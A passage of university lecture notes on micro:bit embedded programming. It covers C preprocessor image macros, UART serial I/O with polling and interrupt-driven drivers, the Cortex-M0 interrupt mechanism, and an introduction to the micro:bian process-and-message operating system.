ldr r1, =0x50000500
str r0, [r1, #0x4]

How does the IMAGE macro work?

The declaration

const unsigned heart[] =
    IMAGE(0,1,0,1,0,
          1,1,1,1,1,
          1,1,1,1,1,
          0,1,1,1,0,
          0,0,1,0,0);

defines heart to be an array of constants that represent the heart image. It is reduced to a simple array declaration by a process of textual substitution (performed by the C preprocessor), followed by simplification (performed by the C compiler proper). Let's follow the process with the example. When compiling for V1, the IMAGE macro is defined like this:

#define IMAGE(x11, x24, x12, x25, x13,                               \
              x34, x35, x36, x37, x38,                               \
              x22, x19, x23, x39, x21,                               \
              x18, x17, x16, x15, x14,                               \
              x33, x27, x31, x26, x32)                               \
    { __ROW(ROW1, x11, x12, x13, x14, x15, x16, x17, x18, x19),      \
      __ROW(ROW2, x21, x22, x23, x24, x25, x26, x27, 0, 0),          \
      __ROW(ROW3, x31, x32, x33, x34, x35, x36, x37, x38, x39) }

See how the documented wiring pattern is reflected in the order that the 25 arguments to the macro are listed? So as a first step, the declaration of heart is expanded into

const unsigned heart[] =
    { __ROW(ROW1, 0, 0, 0, 0, 1, 1, 1, 0, 1),
      __ROW(ROW2, 1, 1, 1, 1, 1, 0, 0, 0, 0),
      __ROW(ROW3, 1, 0, 0, 1, 1, 1, 1, 1, 1) };

But __ROW is itself a macro, defined by

#define __ROW(r, c1, c2, c3, c4, c5, c6, c7, c8, c9)                 \
    (BIT(r) | !c1<<4 | !c2<<5 | !c3<<6 | !c4<<7 | !c5<<8             \
     | !c6<<9 | !c7<<10 | !c8<<11 | !c9<<12)

(and ROW1, ROW2, ROW3 and BIT are also macros), so the preprocessor ultimately expands the declaration into

const unsigned heart[] =
    { ((1 << (13)) | !0<<4 | !0<<5 | !0<<6 | !0<<7 | !1<<8 | !1<<9 | !1<<10 | !0<<11 | !1<<12),
      ((1 << (14)) | !1<<4 | !1<<5 | !1<<6 | !1<<7 | !1<<8 | !0<<9 | !0<<10 | !0<<11 | !0<<12), 
      ((1 << (15)) | !1<<4 | !0<<5 | !0<<6 | !1<<7 | !1<<8 | !1<<9 | !1<<10 | !1<<11 | !1<<12) };

Because the macro expansion process is purely textual, it's possible to have a macro that expands into an arbitrary piece of program text, not just a single expression. In this case, the IMAGE macro expands into a curly-bracketed list of expressions that form the initialiser in an array declaration.

When the compiler itself encounters this expanded declaration, it starts to simplify it. It's a rule of C that an expression with a constant value is allowed wherever a simple constant may appear, so we may be sure that the C compiler will do its best. First, the ! operator maps 0 to 1 and 1 to 0, so that the bits have the right polarity. Next, the << operator shifts each bit to the right place, and the | operator combines the bits into a single word. There are a few extra parentheses in the expression that have been inserted by various macros for safety, and these are just ignored by the compiler as they should be. The upshot is that the compiler treats the declaration as if it had been written

const unsigned heart[] = {
    0x28f0, 0x5e00, 0x8060
};

but with a lot less effort on the part of the programmer. The calculation of these bit patterns happens entirely at 'compile time', while the compiler is deciding what binary data will make up the code that it outputs. The compiler reduces the input expression to a simple table, and no calculations of bit patterns happen at 'run time', while the program is running.

Lecture 9




Lecture 9 – Serial I/O

Serial protocol. A simple, polling UART driver.

Serial communication

GPIO pins let us communicate from a program to the outside world, but they are little more (as far as we've seen) than a direct connection between the bits of a register in the microcontroller and signal wires in the external circuit. A serial communications interface provides an example of a more elaborate I/O device, capable of actions independent of the CPU; the complexity this adds is necessary, because serial transmission must be done with timing that is more precise than we can achieve with direct CPU control – or at least, more precise unless the CPU is doing nothing else.

[9.1] Here is a trace (obtained with a logic analyser) of a character being sent over a serial interface at a speed of 9600 baud: that is, 9600 bit-clocks per second.

RS-232 waveform

The relevant traces are the signal (marked D1) that appears on the wire, and below it two analyses performed by the logic analyser software starting from the captuted data. One of these (marked UART) shows the individual bits that are transmitted, and the characters they make up, and the other (marked Timing) shows the duration of each low or high period of the signal

The character begins with a start bit during which the signal is 0V; the start bit lasts for precisely 104μs = 1/9600s. There then follow 8 bits of data, sent LSB first, with 0 encoded by 0V and 1 encoded by +3.3V. The bits (in order of transmission) are 10010110, making (reading backwards) the character 0x69, or lower-case 'i' in ascii. The transmission ends with a stop bit at the high level, 3.3V. The signal could then stay at a high level for a while, but just disappearing off the right-hand side of the screen, you can see that the start bit for the next character in this case follows immediately. This pattern, a start bit followed by 8 data bits, (no hardware parity bit), and a stop bit, is the most common variant of serial transmission, and is described by the abbreviation 8N1. There are ten bit-periods per character transmitted, so 9600 8N1 is capable of a peak transmission rate of 960 characters/sec. These conventions are standardised and often go by the term RS-232: but strictly speaking that standard requires voltage levels of ±12–15V suitable for use with old-fashioned teleprinters, and recent computers more commonly use voltages of 5V and 0V or (as here) 3.3V and 0v. Although we shall not use it, it's possible to add a parity bit to each character so that the receiving end can check whether a bit of the character has been corrupted in transmission.

Note that there is no clock signal shared between receiver and transmitter, so precise timing is essential. In order to achieve this, both transmission and reception are commonly implemented in hardware. The transmitter makes sure each bit-period lasts precisely 104μs, and the receiver, after seeing the falling edge of the start bit, will wait for 1.5 bit-periods in order to sample the first bit in the middle of its period; then it samples at 2.5, 3.5, ... bit-periods after the start so as to capture successive bits. (Interfaces commonly sample multiple times per bit-period and use majority voting to improve their immunity to noise.) The receiver can look for the stop bit to verify that the timing is reasonably accurate before announcing that it has received a character.

The serial interface is called a UART (for Universal Asynchronous Receiver/Transmitter) – Universal because it can deal with speeds other than 9600 baud and encodings different from 8N1; and Asynchronous because of the lack of a shared clock. The UART derives its timing by dividing the 16MHz system clock, and part of the configuration process is to set the division ratio to give an accurate bit-rate. The UART has two halves – a receiver and a transmitter – and a serial connection usually consists of two wires, on linking TX on one device to RX on the other, and the second linking RX to TX, for "full duplex" operation. It's possible to add two additional wires labelled RTS and CTS for 'hardware flow control', so that either end can signal to the other that it is not ready to receive any more characters and transmission should be delayed. As is common, we will not bother with these signals, assuming that both ends are able to consume characters at the highest rate they can be transmitted. At 9600 baud, this should not cause any problems.

A basic driver

The nRF51822 has a single UART that can be connected to the USB interface chip on the micro:bit board, and then appears as a USB serial interface on the host computer. We have already used this interface to experiment with assembly language programming. The UART is presented to a program running on the nRF51822 as a collection of device registers at fixed addresses, and predefined contants like UART_TXD let us access these registers. Some of the registers are used for configuration, and we need not list them in detail, but two are used in the process of transmitting characters. By putting a character in the register UART_TXD, the program can start the UART transmitting the character over the serial line. To find out when the transmission is finished, the program can check another register, UART_TXDRDY, which is set to 1 when the UART is ready for another character. If another character is immediately put in UART_TXD, then it will follow the first character without a gap, as shown in the scope trace above. If there is some delay before the program provides another character, then the TX line will just remain high, and the device on the other end of the wire will wait.

[9.2] The main difficulty is that we mustn't ask the UART to transmit another character until it has finished with the previous one, or it will get confused, either cutting off the transmission of the first character in the middle, or maybe ignoring the second character. So before sending a character, we must ensure that UART_TXDRDY has been set to 1 by the device. The simplest way of doing this is to wait in a busy loop.

void serial_putc(char ch) {
    while (! UART_TXDRDY) { /* do nothing */ }
    UART_TXDRDY = 0;
    UART_TXD = ch;
}

(This code omits a detail connected with transmitting the very first character.) This works, but it suffers from the same problem as the LED program – while the serial_putc function is waiting, no useful work is being done.

[9.3] We can illustrate the problem with a program for printing the first 500 primes.

void init(void) {
     int n = 2, count = 0;

     serial_init();
     start_timer();

     while (count < 500) {
          if (prime(n)) {
               count++;
               printf("prime(%d) = %d\r\n", count, n);
          }
          n++;
     }

     stop_timer();
}

The program uses printf to print its results, a wrapper around serial_putc that looks like the standard C function for formatted output. I've included calls to functions start_timer and stop_timer that turn on and off an LED, so that we can time how long the program takes. We can run the program and connect to the micro:bit with minicom as before and see the primes scrolling past:

prime(1) = 2
prime(2) = 3
prime(3) = 5
...
prime(500) = 3571

Lab 3 has a version of this program: there, prime(n) is implemented by a simple algorithm that is quite slow, particularly because it is using a naïve algorithm for division. The time to find the next prime can get quite long, particularly when large gaps begin to appear, such as the one between 3229 and 3251. (And yes, we are testing the even numbers as well as the odd ones!)

[9.4] Initialising the UART is a bit involved, but the code can be copied from manufacturer's example programs, and amounts to making proper settings of several device registers. The two pins (defined by constants USB_TX and USB_RX) must be configured one as an output and the other as an input, both with pullup resistors enabled. Then there is a device register that is set according to the baud rate, and another to set the format to 8N1. At the end come some assignments to start the sending and receiving processes and clear the flags that indicate the interface is ready for a character.

/* serial_init -- set up UART connection to host */
void serial_init(void) {
    UART_ENABLE = 0;
    UART_BAUDRATE = UART_BAUD_9600;     // 9600 baud
    UART_CONFIG = 0;                    // format 8N1
    UART_PSELTXD = USB_TX;              // choose pins
    UART_PSELRXD = USB_RX;
    UART_ENABLE = UART_Enabled;
    UART_STARTTX = 1;
    UART_STARTRX = 1;
    UART_RXDRDY = 0;
    UART_TXDRDY = 0;
    txinit = 1;
}

[9.6] Actually, this program allows a small amount of overlap between printing one prime and looking for the next one. (How?) But once the primes start to thin out, pauses start to appear between lines of output. We can show this by connecting the micro:bit up to a logic analyser and capturing a trace. I am using an inexpensive PC-based logic analyser bought on eBay: similar devices are easily found by googling "logic anaylser 24MHz 8ch". They are all based on the same Cypress microcontroller, and all the smarts are in the associated open-source software.

Connecting a logic analyser

In the picture, the micro:bit is connected to two channels of the logic analyser, using an edge connector breakout to make the signals available on header pins.

  • Channel 0 (black wire) is connected to a GPIO pin that is used to drive one of the LEDs. This shows when the LED signal is illuminated. (Detail: the column I've used is not one of the ones that is lit, so it is high when the LED pattern is placed on the GPIO pins, and reverts to low when the output register is reset to zero.)
  • Channel 1 (brown wire) is connected to the transmit line of the UART. The transmit and receive lines between the UART and the USB interface chip are not brought out to the edge connector, but are available at certain test points on the board. In the picture, a bodge wire connects the relevant test point to a header glued to the edge of the board, on the back as we look at it. The orange wire joins the header to the brown lead of the logic analyser.
  • The third connection (white wire) is ground.

The logic analyser lets us see traces of multiple signals over time: unlike an oscilloscope, it can record data from 8 channels for an almost unlimited time, but it records only a digital logic level for each channel, and not an analogue voltage. The logic analyser's software is equipped with decoders for a variety of protocols including serial data, so we can ask it to annotate the trace with the decoded characters.

[9.7] Here is a trace of the beginning of a run of the program, on a smaller timescale than the trace we saw earlier.

Start of execution
  • In the picture, you can see two traces: one (Channel 0) is the long pulse that powers the LED, showing that it takes 11.618 seconds to find all 500 primes; the other (Channel 1) is the signal on the serial line, and above it a decoding of the characters that are being sent. You can see the string "prime(1) = 2", followed by a carriage return ([0D]) and line feed ([0A]). The p that begins the next line of output "prime(2) = 3" follows immediately after the line feed without any delay.
  • The scale at the top is in milliseconds, and you can see that transmitting each character takes just a bit more than 1ms.

Further along the trace, we can see delays start to appear between one line of output and the next. Two successive lines of output read

prime(457) = 3229
prime(458) = 3251

Here is the corresponding part of the logic analyser trace, zoomed about a bit to show the length of the gap between them.

Gap in the output

From the times at the top, you can see that this portion comes from late in the run, about 10.2s in. There is a period of 25ms or so when the serial line is idle, between the line feed that ends one line of output and the p that begins the next one. During this period, the machine is testing successive numbers to see whether they are prime, and it is spending most of its time in a loop inside the division subroutine. Once the next prime has been found, the activity changes, and the machine spends most of its time in the loop shown above, waiting for UART_TXDRDY to become true. This behaviour is silly, because instead of idly waiting for transmission of a character to finish, the micro:bit could be doing useful work towards finding the next prime. As we shall see later, we can arrange for this to happen (without having to restructure our whole program) by introducing a buffer to store pending output characters, and using interrupts to make the processor respond whenever the UART is ready for the next character, without having it sit in a loop waiting.

Lecture 10

Lecture 10 – Programming with interrupts

Interrupt-based driver for UART.

Without interrupts

We could improve the performance of the primes program by storing in a buffer (deteailed implementation later) the characters that had been generated by printf but not yet sent over the UART. Then we could rewrite the inner loop of the prime-testing subroutine so that it checked whether the UART was ready to transmit another character:

int prime(int n) {
    int k = 2;

    while (k * k <= n) {
        if (n % k == 0) return 0;
        poll_uart();
        k++;
    }

    return 1;
}


void poll_uart(void) {
    if (UART_TXDRDY) {
       // send another char
    }
}

There are (at least) two big problems with this approach.

  1. It's really inefficient: the constant checking of the UART slows down the most computationally-intensive parts of the program.
  2. It makes maintaining the program really hard, because different parts of the task must be mingled together. In particular, the program can't use any library routines if those routines take an appreciable time, because any loops in them must be rewritten to include a call to poll_uart().

So we need to find a better way.


Interrupts

[10.1] A better approach in the primes program is to control the UART using an interrupt. We can configure the hardware of the UART specially so that the normal flow of execution of the program is interrupted when UART_TXDRDY becomes true, and at that point (between two successive instructions of the program), a special subroutine

uart_handler()

is called. We can arrange that serial_putc(ch) does not usually wait until it can output the character ch, but instead stores it in an array txbuf, and the interrupt handler retrieves characters from the array and sends them to the UART.

[10.2] We'll set up txbuf as a circular buffer, with two indices bufin and bufout, and (redundantly) a counter bufcnt that tells how many characters are stored. We can declare the variables we need like this:

#define NBUF 64

static volatile int bufcnt = 0;
static int bufin = 0;
static int bufout = 0;
static volatile char txbuf[NBUF];

static volatile int txidle;

Note the use of the volatile keyword for variables that are shared between the main program and the interrupt handler.

[10.3] If bufin < bufout, then the part of the array that is occupied wraps around from txbuf[NBUF-1] to txbuf[0].

A circular buffer

[10.4] Let's write the interrupt handler first:

void uart_handler(void) {
    if (UART_TXDRDY) {
        UART_TXDRDY = 0;
        if (bufcnt == 0)
            txidle = 1;
        else {
            UART_TXD = txbuf[bufout];
            bufcnt--;
            bufout = (bufout+1)%NBUF;
        }
    }
}
  • The interrupt handler begins by checking why it has been called: UART_TXDRDY = 1 is one reason, but there may be others.
  • If there is nothing to transmit, the handler sets the flag txidle.
  • Otherwise, it fetches a character from the buffer and starts the UART transmitting it.
  • Making NBUF a power of 2 will make the modulo operation %NBUF cheaper on a machine with no divide instruction.

[10.5] Here is the corresponding code for serial_putc:

void serial_putc(char ch) {
    while (bufcnt == NBUF) pause(); 
    intr_disable();
    if (txidle) {
        UART_TXD = ch;
        txidle = 0;
    } else {
        txbuf[bufin] = ch;
        bufcnt++;
        bufin = (bufin+1)%NBUF;
    }
    intr_enable();

}

Because an interrupt may come at any time, we must be quite careful.

  • Variables such as bufcnt that are mentioned in both the main program and the interrupt handler are marked volatile. This prevents the compiler from looking at a loop such as
while (bufcnt == NBUF) pause();
and assuming that bufcnt doesn't change in the loop, and so does not need loading from memory in each iteration. On the contrary, bufcnt will eventually be reduced by the interrupt handler, and then the loop should terminate. This won't happen if the loop continues to look at a stale copy of the value in a register.
  • [10.6] We know bufcnt++ will be implemented by code like this:
ldr r0, =bufcnt
ldr r1, [r0]
                <-- Here!
add r1, r1, #1
str r1, [r0]
If an interrupt happens "here", then the effect of the statement bufcnt-- in the interrupt handler will be lost, because when the interrupt handler returns, it is an old value of bufcnt that is incremented. The simple solution is to disable interrupts throughout this function by putting intr_disable() at the start and intr_enable() at the end.
  • If the buffer is full when we want to add a character to it, then we must wait until at least one character has been removed from the buffer and sent to the UART. The idiom for doing this is the call pause(), implemented by a special instruction wfe (wait-for-event): this halts the processor until an interrupt occurs, saving power. It's possible that, even if this task is held up because the buffer is full, there are other tasks that could continue to run, and we might need them to run in order (for example) to continue updating the display. For that, we will need to introduce an operating system that allows multiple processes that run independently.

[10.7] For interrupts to work, we must enable them when the program starts. Here's some code to add to serial_init that does this.

void serial_init(void) {
    ...
    // Interrupt for transmit only
    UART_INTENSET = BIT(UART_INT_TXDRDY);
    enable_irq(UART_IRQ);
    txidle = 1;
}

There are three bits of hardware that play a part: the UART itself must be told to interrupt when TXDRDY is set (and not in this case when, e.g., RXDRDY is set because an input character has arrived). Then the chip's "Nested Vectored Interrupt Controller" must be set up, assigning an arbitrary priority to the UART interrupt, and setting a bit that allows the UART to interrupt the processor. Finally, the processor itself must be in a state where it accepts interrupts; this is the default, but it can be modified with the operations intr_disable() and intr_enable() used above.

Updated results

[10.8] We can run the modified program again to see whether the delays in the output have disappeared. The program starts in much the same way.

Primes with interrupts

The LED is on for a period about two seconds shorter than before. When we look at prime 458, the gaps has disappeared, as have all other gaps in the output.

No more gaps

[10.9] If we look at the end of the run, there is a surprise: the output goes on after the main program has finished, as the interrupt handler continues to send characters until the buffer is empty.

Cheating at the end

Even though it cheats in this way, the program still runs a bit more quickly, because the time to find the primes is now entirely overlapped with the printing process.

Lecture 11

Lecture 11 – The interrupt mechanism

What the hardware does with interrupts.


Saving and restoring context

Interrupts behave (from the programmer's point of view) as subroutine calls that are inserted between the instructions of a program, in response to hardware events. So that these subroutine calls do not disrupt the normal functioning of the program, it's important that the entire state of the CPU is preserved by the call. This means not only the data registers, but also the address stored in the link register, and the state of the flags. For example, if a leaf routine is interrupted and has its return address stored in the link register, then that return must be preserved for use when the interrupted routine returns. And if an interrupt comes between the two instructions in a typical compare-and-branch sequence:

cmp r0, r1
beq label

then the flags set by the comparison must be preserved by the interrupt so they can be used to determine whether the branch is taken.

On the Cortex-M0, this is done in such a way that the interrupt handler can be an ordinary subroutine, compiled with the same conventions as any other. That means the compiler that translates each subroutine need not know which ones will be installed as interrupt handlers, and also that no assembly language coding is needed to install an interrupt handler. When an interrupt arrives:

  • the processor completes (or, rarely, abandons) the instruction it is executing.
  • some of the processor state is saved on the stack. The saved state consists of the program counter, the processor status register (containing the flags), the link register, and registers r0, r1, r2, r3 and r12.
  • The link register lr is set to a magic value (not a valid address) that will be recognised later.
  • The program counter pc is loaded with the address of the interrupt handler. Each device that can interrupt (up to 48 different ones) has a number, and that number is used as an index into a table of interrupt vectors that (on the Nordic chip) is located in ROM at address 0.

The state is now as shown in the middle diagram below, which shows what happens when a subroutine P receives an interrupt with handler H.

Stack states during interrupt entry

The interrupt handler must obey the normal calling conventions of the machine: if it calls other subroutines (as it may) or uses registers r4-r7 (or, less likely, r8--r11) then it must save lr with its magic value and these registers in its stack frame. So, working together, the hardware and the procedure's prologue save all of r0-r12, plus the pc and lr, and things are arranged so that when the handler returns, it will use the magic value as its return address.

The interrupt handler is now running in a context that is equivalent to the one it would see if it had been called as an ordinary subroutine. It can make free use of registers r0--r3, and can use registers r4--r7 if it has saved them. It can call other subroutines that obey the same calling conventions, and their stack frames will occupy space below its frame and the exception frame on the stack.

When the handler returns, it will restore the values of r4--r11 to the values they had before the interrupt, then branch to the magic value. This signals the processor, instead of loading this value into the pc, to restore the values that were saved by the interrupt mecahnism, and the processor returns to the interrupted subroutine. Global variables may have been changed by the interrupt handler – for example, a character may have been received by the UART and put in a buffer – but all the local state is just as it was before the interrupt handler was invoked.

In each program, the table of interrupt handlers is put together by the linker, guided by the linker script NRF51822.ld, which specifies they should go at address 0. The code in startup.c makes each vector point to a default handler that flashes the Seven Stars of Death, unless a subroutine with an appropriate name such as uart_handler is defined somewhere in the program.

In the Cortex-M0, the management of interrupts is delegated to a semi-detached functional unit called the Nested Vectored Interrupt Controller (NVIC). We need to know about this, because to use interrupts, three separate units must be set up properly: the device, so that it requests an interrupt when certain events happen; the NVIC, so that it enables and gives an appropriate priority to interrupts from the device, and the CPU itself, so that it responds to interrupt requests. The name of the NVIC gives a clue to some aspects of its operation:

  • It supports nested interrupts – that is, each device is given a configurable priority, and during the handling of an interrupt from a low-priority device, interrupts from higher-priority devices may happen. We will not use this, but will soon move to an operating system where most interrupt handlers are very short and just convert the interrupt into a message: this removes the worry that handling one interrupt will block another one for too long. Note that, in any case, a device cannot have higher priority than itself, so the interrupt handler for a device completes before another interrupt from the device is accepted.
  • This (delaying interrupts until the CPU is ready for them) works because the NVIC keeps track of which devices have pending interrupts, and will send requests to the CPU when it can handle them. There is just one pending interrupt for each device, so if we want (for example) to count interrupts as clock ticks, then we must be sure to service each interrupt before the next one arrives.
  • Interrupts are vectored – that is, each device can have a separate interrupt handler, rather than (say) having one handler for all interrupts that must then work out which device(s) sent the request. Note, however, that a device can generate interrupts for multiple reasons, so the handler must then work out why the interrupt happened, and respond appropriately. For example, the UART can interrupt when it is ready to output a fresh character, but also when it has received a character that it is ready to pass the the CPU.
  • Interrupts can be disabled in several ways: all interrupts can be disabled and enabled in the CPU by using the functions intr_disable() and intr_enable() that are aliases for the instructions cpsie i and cpsid i. We can also disable interrupts from a specific device by using the functions disable_irq(irq) and enable_irq(irq). Interrupts for specific events can also be enabled and disabled by using the device registers for a specific device.
  • There are a couple of system-level interrupts (also called exceptions) that are not associated with any particular device. One of these is the HardFault exception that is triggered when a program attempts an undefined action, such as an unaligned load or store. In our software, the handler for the HardFault exception shows the seven stars of death.[1]
  • Another kind of system event is triggered when the processor executes an svc (supervisor call) instruction. When we introduce an operating system, this will mean that there is a uniform way of entering the operating system, whether it is entered because of a hardware event or a software request. On machines (the Nordic chip isn't one of them) where application programs run with less privileges than the operating system, the svc instruction is also the means for crossing the boundary between unprivileged and privileged programs.

Context

The interrupt mechanism of the Cortex-M0 is unusual in obeying its own calling conventions: that is to say, the actions on interrupt call and return exactly match the conventions assumed by compilers for the machine. This makes it possible for interrupt handlers to be subroutines written in a high-level language and compiled in the ordinary way. It's more normal for machines to save only a minimal amount of state when an interrupt happens: perhaps just the program counter and processor status word are pushed on a stack, and the program counter is loaded with the handler address. When the interrupt handler wants to return, it must use a special instruction rti that restores the program counter and status word from the stack, rather than the usual instruction for returning from a subroutine. If we want to write interrupt handlers in a high-level language, then a little adapter written in assembly language is needed. It saves the rest of the state including the register contents (or at least those registers that are not preserved according to the calling convention), then calls the subroutine; and when the subroutine returns, it uses an rti instruction to return from the interrupt. Of course, it is possible for the machine-language shim that saves and restores the processor state to be generated by a compiler, and on some machines the compiler lets you mark a C function specially, so that it becomes an interrupt handler rather than an ordinary function. The simpler kind of interrupt mechanism has some advantages: simpler hardware, for one, and the possibility of hand-crafting an interrupt handler in assembly language that runs more quickly by saving and restoring only part of the state.

Heart revisited

Heart versions: 0: Delay loops. 1: Timer-based delay. 2: Interrupt driven. 3: Operating system process.

Our first heart program used a timing loop. We can improve it in two ways:

  1. Use one of the chip's timers to generate the delay. We can arrange for the timer to generate an interrupt at regular intervals, then count the interrupts and implement delay by pausing in a loop, waiting for the count to reach a desired value.
  2. Make the display update itself part of the interrupt handler for the timer. This would allow the main program to be dedicated to another task.

The timer hardware is typical of what is provided in microcontrollers: there's a prescaler that we can use to divide the 16MHz system clock by 24, then a counter that counts up to a predefined value and then generates an interrrupt. On the Nordic chip, we can configure a 'shortcut' to reset the counter when the interrupt happens: this is a good idea, because it removes interrupt latency from the timer period. We can set the limit to 1000 for one interrupt each millisecond.

Block diagram for counter/timer

This interrupt handler increments the global variable millis every millisecond.

unsigned volatile millis = 0;

void timer1_handler(void) {
    if (TIMER1_COMPARE[0]) {
        millis++;
        TIMER1_COMPARE[0] = 0;
    }
}

Now we can re-implement delay like this.

void delay(unsigned usec) {
    unsigned goal = millis + usec/1000;
    while (millis < goal) {
        pause();
    }
}

Most of the time, the processor will be halted in the pause() routine, and it will wake only 5 times for a 5 millisecond delay. (The 32-bit counter millis will overflow after 232 milliseconds or 49.7 days, but Valentine's Day will be over by then.)

This implements idea number 1, but leaves us with a main program that contains a loop for updating the display.

Idea number 2 is to do all the work in the interrupt handler, so that the main program does nothing:

while (1) pause();

or better still, can get on with some background task like finding primes. To do this, we must arrange that updating the display is a subroutine that can be called periodically. If we accept a static (but still multiplexed) display, this is easy enough. We can make the current row into a global variable,

static int row = 0;

Then we'll adjust the timer code so that it generates one interrupt every 5 msec (by setting the limit register to 5000), and arrange for the interrupt handler to call a function advance(), defined like this:

void advance(void) {
    row++;
    if (row == 3) row = 0;
    GPIO_OUT = heart[row];
}

It's also possible to generate an animated display with similar technques (see the Problem Sheet), but this style of programming obviously has its limitations. The big disadvantage remains – there is only one main program, so only one task can have internal control structure, and all the others must be expressed as subroutines that are called at appropriate times, with their entire state stored in variables between one invocation and the next.

Questions

Can an interrupt handler itself be interrupted?

The interrupt controller (NVIC) provides a priority scheme, so that the handler for a low-priority interrupt can be interrupted if a request for a higher-priority interrupt comes in: these 'nested' interrupts are the N in NVIC. But we shall not use this scheme, instead giving all interrupts the same priority. In micro:bian, interrupt handlers will be very short, and just send a message to an attached driver process, so there is no need for nested interrupts. But whether nesting is allowed or not, it's clear that an interrupt handler cannot be interrupted by a second request for the same interrupt, because no interrupt can have a priority that is higher than itself.

How can the processor work out which interrupt is active when interrupts are nested, or one interrupt follows another?

The first answer is that the interrupt handler is called via the appropriate vector, and each interrupt can have a different handler. The linker script and startup code collaborate so that a routine in our program named, e.g., uart_handler will be installed in the correct slot in the vector table, and when it is invoked we can be sure that the UART has requested an interrupt: then we need only determine which reason caused the interrupt among the reasons that are possible for the UART.

If there is no specific interrupt handler for a device, then the startup code fills the vector with the routine defualt_handler. That routine is implemented in micro:bian so that it finds the device driver process (if any) associated with the interrupt and sends it a message, or otherwise shows the Seven Stars of Death. To find out which interrupt has happened, it uses active_irq(), a macro defined in hardware.h, to access the appropriate field in the Interrupt Control and Status Register, part of the System Control Block.

/* active_irq -- find active interrupt: returns -16 to 31 */
#define active_irq()  (GET_FIELD(SCB_ICSR, SCB_ICSR_VECTACTIVE) - 16)

It looks complicated, but just amounts to the fact that there's a location in the address space of the machine that always contains the number of the active interrupt. The hardware at this point numbers internal exceptions from 0 to 15, and external interrupts from 16 up, so it's convenient the subtract 16 to get an interrupt number that starts from 0; the micro:bian interrupt routine then uses this as an index into its table of device driver processes. The constants used in this macro are defined in hardware.h with numeric values gleaned from the hardware manual. It's guaranteed that this field in the ICSR is accurate even if interrupts are nested, and even if one interrupt follows close on the heels of another.


Lecture 12


  1. We should mention somewhere that the proper response to an exception such as HardFault in an embedded system is to enter a mode where the system tries, with the mimimum of assumptions, to bring things to a safe state.

Lecture 12 – Introducing micro:bian

Processes and messages.

Our best attempt so far at a prime-printing program uses interrupts to overlap the search for more primes with printing the primes it has found, but when the buffer of output characters is full, it still falls back on the tactic of waiting in a loop for space to become available. If the program is producing primes at a faster rate than the UART can print them, then there's really nothing else we can do.

But perhaps there are other tasks that the machine needs to do – such as showing something on the display at the same time as computing primes. If that's so, then we will want to move away from a structure where there is a single main program and a collection of interrupt handlers that are called from time to time. Unless the other functions of the program can be implemented entirely in interrupt handlers, we need more than one 'main program' to share the processor somehow.

Also: the printer driver disables interrupts in order to manipulate a data structure (the circular buffer) that is shared between the interrupt handler and the function serial_putc. It's tricky to get this right, and disabling interrupts for more than a brief moment risks delaying other things (like multiplexing the display) that ought to happen promptly.

All this means that we are ready to begin using a kind of operating system – a process scheduler. We'll be using a very simple embedded operating system that I've named micro:bian, based on the idea of a fixed set of concurrent processes that communicate with each other by sending messages. The design is based on a much-simplified version of the internal structure of Andy Tanenbaum's operating system Minix, an implementation of Unix that is a predecessor of Linux.

Notes: Minix uses message-passing internally, but the interface it presents to user processes is Unix, with fork and exit, signals and pipes. Although Linux arose out of Minix, its internal structure is entirely different. All modern Intel machines run a version of Minix on an internal system-management processor, making it arguably the world's most used operating system – except possibly for the L4 microkernel that runs on the other, secret processor in your mobile phone.

There's a page with a brief programmer's manual for micro:bian.

micro:bian vs Phōs

The operating system formerly known as Phōs has now become micro:bian, and I'll mention here the main differences between them, just in case confusion is caused by a possible failure to remove all references to Phōs and its conventions from the rest of the notes. In Phōs, a receiving process could select what process it wanted to hear from and not what message it wanted to receive. The two conventions are roughly equivalent in expressive power (and they could be combined if we didn't care about keeping things simple), but the new scheme is better for a few of the examples we want to look at.

In both schemes, receive() takes two parameters, one either a process id or a message id (in the two cases), and the other (a pointer to) a message buffer. In Phōs, send() also took two parameters, one a process id for the destination and the other a message buffer, and programmers had to fill in the message type before calling send(). In micro:bian, the message type is a parameter to send(), and the message buffer can be NULL if there is no additional data to send.

Processes

A micro:bian program can contain multiple processes that all make progress as the program runs. We can imagine that the processes run simultaneously – but on a uniprocessor machine, this illusion is maintained by interleaving them: we say that they run concurrently, making progress at different rates.

For example, we could start to design a program that both shows a beating heart and prints primes on the serial port. These two activities are independent of each other, and we would like to write two routines that describe the two activities. Here's the natural way of finding and printing the primes:

static void prime_task(int arg) {
    int n = 2, count = 0;

    while (1) {
        if (prime(n)) {
            count++;
            printf("prime(%d) = %d\n", count, n);
        }
        n++;
    }
}

And here's the natural way of writing the heart process:

static void heart_task(int arg) {
    GPIO_DIRSET = 0xfff0;

    while (1) {
        show(heart, 70);
        show(small, 10);
        show(heart, 10);
        show(small, 10);
    }
}

(Note that each of these functions takes an integer parameter arg that can be specified when the process is started, but that both these particular processes ignore their parameters.) The idea is that the one processor on the board will run these two programs in turn, stopping each of them when they need to wait for something and running the other one for a while.

Many operating systems multiplex the processes in a way that's based on time-slices: the processor has a clock that measures actual time, and it lets each process in turn run for 50 millisec (say) before moving on the next one. At least initially, we will do without this idea, and run each process until it can make no more progress. In the case of the two processes in the example program, the primes-finding process will need to pause when it wants to output a character, and the heart display pauses explicitly to wait until it is time to change the image. In both cases, the pause happens in a subroutine called from the main routine of the process, and (as we shall see later) occurs by means of sending a message to another process, or waiting to receive one. The operating system arranges all the running processes in a circle, giving each a chance to run until it pauses, then moving on to the next one. There's no guarantee that each process gets the same fraction of the processor time, just as there's no guarantee when you pass round a bag of sweets that each person will take just one. Actually, as we'll see, the processes we write will usually run for only a short time before needing to wait for something, and at that stage the processor gets assigned to a different task. There's a system call yield() that a process can use to give up the processor voluntarily, but it is rarely needed in the actual programs we will write, because the processes we design will pause naturally.

We can already notice that both the processes we have written call subroutines: primes_task calls prime, and that will call a subroutine to perform integer division, and it calls printf, which in turn calls a version of serial_putc. Equally, heart_task calls show, which presumably sets a pattern on the LEDs and then delays for a time. So if these two processes are going to run concurrently, one single subroutine stack at the top of memory isn't going to be enough. In fact, a vital part of the implementation of the operating system will be to provide a separate stack for each process, and switching between processes will involve resetting the stack pointer so that each process uses its own stack. The one original stack will remain in existence, and will be used by the operating system itself.

Microbian supports programs that contain a fixed number of processes, all created when the program starts and usually all running forever. The function init that, up to now, has been the 'main program' in each application, will now become very simple: it creates a number of processes then returns, and it is after init has returned that the real work begins: micro:bian takes the processes that have been created and starts to run them in turn, and that is the entire work of the program. You may think of your program as having a 'main' process if you like, but micro:bian doesn't, and treats all processes alike, running them when they are ready and letting them wait when they are not. here's the init function for the heart--primes application (edited):

void init(void) {
